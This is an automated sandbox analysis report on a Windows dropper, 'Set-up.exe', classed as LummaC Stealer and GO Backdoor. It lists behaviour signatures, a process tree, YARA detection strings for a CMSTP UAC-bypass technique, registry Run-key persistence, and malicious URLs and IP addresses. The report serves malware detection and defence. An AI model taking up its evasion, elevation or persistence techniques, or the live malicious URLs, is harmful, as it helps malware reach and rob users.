Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1635524
MD5:0665eccf53dbdefae8c6789962993a70
SHA1:3d1c966a7359856ee1532aaeec02b1f77b2f160d
SHA256:3060fb37f6a35e6c8f5593e09752d8090d0127f5339c2c38360c549f765cba0f
Tags:exeLummaStealeruser-aachum
Infos:

Detection

GO Backdoor, LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected GO Backdoor
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 0665ECCF53DBDEFAE8C6789962993A70)
    • K07BOQJSAWQXKEH8FTYNN.exe (PID: 6964 cmdline: "C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe" MD5: E09C2CF3B8FCB1AA86C7A83AB5A04C49)
    • Server.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe" MD5: A5EE3594A2A4697E0D71A1C3E622BD1F)
      • more.com (PID: 1444 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • explorer.exe (PID: 5436 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • Server.exe (PID: 5860 cmdline: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe MD5: A5EE3594A2A4697E0D71A1C3E622BD1F)
    • more.com (PID: 8024 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 1684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Server.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe" MD5: A5EE3594A2A4697E0D71A1C3E622BD1F)
  • rareTemp.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Local\Temp\rareTemp.exe" MD5: E09C2CF3B8FCB1AA86C7A83AB5A04C49)
  • rareTemp.exe (PID: 5016 cmdline: "C:\Users\user\AppData\Local\Temp\rareTemp.exe" MD5: E09C2CF3B8FCB1AA86C7A83AB5A04C49)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.1951577261.000000000158F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000F.00000002.2461023555.000000000B272000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000010.00000002.2482357823.00000000001F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000001.00000003.1898990474.000000000158F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000C.00000002.2396557109.000000000B3C1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.explorer.exe.50a9b57.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              18.2.explorer.exe.50a9b57.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x1de27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x1e0b3:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x1deb2:$s1: CoGetObject
              • 0x1e13e:$s1: CoGetObject
              • 0x1de0b:$s2: Elevation:Administrator!new:
              • 0x1e097:$s2: Elevation:Administrator!new:
              18.2.explorer.exe.50aa757.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                18.2.explorer.exe.50aa757.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x1d227:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x1d4b3:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x1d2b2:$s1: CoGetObject
                • 0x1d53e:$s1: CoGetObject
                • 0x1d20b:$s2: Elevation:Administrator!new:
                • 0x1d497:$s2: Elevation:Administrator!new:
                15.2.Server.exe.b278901.23.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 31 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\rareTemp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe, ProcessId: 6964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecAV
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\rareTemp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe, ProcessId: 6964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecAV

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T18:32:12.782307+010020283713Unknown Traffic192.168.2.449721104.21.72.2443TCP
                  2025-03-11T18:32:16.193476+010020283713Unknown Traffic192.168.2.449723104.21.72.2443TCP
                  2025-03-11T18:32:19.051406+010020283713Unknown Traffic192.168.2.449724104.21.72.2443TCP
                  2025-03-11T18:32:22.350063+010020283713Unknown Traffic192.168.2.449725104.21.72.2443TCP
                  2025-03-11T18:32:25.387590+010020283713Unknown Traffic192.168.2.449726104.21.72.2443TCP
                  2025-03-11T18:32:28.638222+010020283713Unknown Traffic192.168.2.449727104.21.72.2443TCP
                  2025-03-11T18:32:33.370107+010020283713Unknown Traffic192.168.2.449728104.21.72.2443TCP
                  2025-03-11T18:32:36.540623+010020283713Unknown Traffic192.168.2.449729191.101.230.18443TCP
                  2025-03-11T18:32:46.256739+010020283713Unknown Traffic192.168.2.449730104.17.151.117443TCP
                  2025-03-11T18:32:51.336881+010020283713Unknown Traffic192.168.2.449731104.18.36.145443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://peacefzulpillow.today/KdzwefmAvira URL Cloud: Label: malware
                  Source: https://peacefzulpillow.today/KdzweAvira URL Cloud: Label: malware
                  Source: https://peacefzulpillow.today/zAvira URL Cloud: Label: malware
                  Source: https://peacefzulpillow.today/KdzwAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen2
                  Source: C:\Users\user\AppData\Local\Temp\ertyayyeqtcsAvira: detection malicious, Label: TR/ATRAPS.Gen
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen2
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\AppData\Local\Temp\ertyayyeqtcsReversingLabs: Detection: 54%
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeReversingLabs: Detection: 55%
                  Multi AV Scanner detection for submitted file
                  Source: Set-up.exeVirustotal: Detection: 33%Perma Link
                  Source: Set-up.exeReversingLabs: Detection: 50%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 18.2.explorer.exe.50a9b57.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.explorer.exe.50aa757.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.Server.exe.b278901.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Server.exe.b3c7901.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.more.com.483db57.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Server.exe.b4195ce.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.more.com.4465a8a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Server.exe.b3d3901.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Server.exe.b40c9ce.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.Server.exe.b2bd9ce.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.more.com.44ab757.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.more.com.47f8a8a.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Server.exe.b40d5ce.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Server.exe.b4189ce.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.Server.exe.b2be5ce.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.explorer.exe.5064a8a.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.more.com.483e757.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.more.com.44aab57.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2461023555.000000000B272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2482357823.00000000001F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2396557109.000000000B3C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2470851916.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2483054416.000000000445F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3676999259.000000000505E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.2510066732.000000000B3CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: more.com PID: 8024, type: MEMORYSTR

                  Compliance

                  barindex
                  Detected unpacking (creates a PE file in dynamic memory)
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeUnpacked PE file: 11.2.K07BOQJSAWQXKEH8FTYNN.exe.2930000.2.unpack
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeUnpacked PE file: 25.2.rareTemp.exe.2990000.2.unpack
                  Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile opened: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49725 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 191.101.230.18:443 -> 192.168.2.4:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.17.151.117:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.18.36.145:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamarshal\lib\win\release\32\dvamarshal.pdb source: Server.exe, 0000000C.00000002.2383590113.0000000000880000.00000002.00000001.01000000.0000000E.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450996101.0000000000C10000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_date_time\lib\win\release\32\boost_date_time.pdb source: Server.exe, 0000000C.00000002.2388499779.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452932471.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dynamiclink\dynamiclink\lib\win\release\32\dynamiclink.pdb source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_threads\lib\win\release\32\boost_threads.pdb source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2388668803.0000000001523000.00000002.00000001.01000000.0000001D.sdmp, Server.exe, 0000000F.00000002.2453076234.0000000001523000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdb source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp, Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbp source: Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdb source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPH,[G source: Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbP source: Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\MediaFoundation.pdb source: Server.exe, 0000000C.00000002.2388207711.00000000012B0000.00000002.00000001.01000000.00000016.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452454538.00000000012B0000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvacore\lib\win\release\32\dvacore.pdb source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdb source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb` source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ImageRenderer.pdb source: Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2387210258.0000000001091000.00000002.00000001.01000000.00000012.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2451595701.0000000001091000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbPA source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPL source: Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\libm\md\libmmd.pdb source: Server.exe, 0000000C.00000002.2398521146.00000000101F1000.00000002.00000001.01000000.00000019.sdmp, Server.exe, 0000000F.00000002.2463471681.00000000101F1000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: msvcr100.i386.pdb source: Server.exe, 0000000C.00000002.2399201545.000000006D051000.00000020.00000001.01000000.00000010.sdmp, Server.exe, 0000000F.00000003.2423525477.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2463800741.000000006D0B1000.00000020.00000001.01000000.00000010.sdmp
                  Source: Binary string: msvcp100.i386.pdb source: Server.exe, 0000000C.00000002.2399662755.000000006D111000.00000020.00000001.01000000.0000000F.sdmp, Server.exe, 0000000F.00000002.2463953503.000000006D171000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdb source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdbP source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdb source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdb source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbP8 source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbpC(zB source: Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdb source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPQ source: Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb` source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLMessaging.pdb source: Server.exe, 0000000C.00000002.2388001008.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000002.2452288985.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp
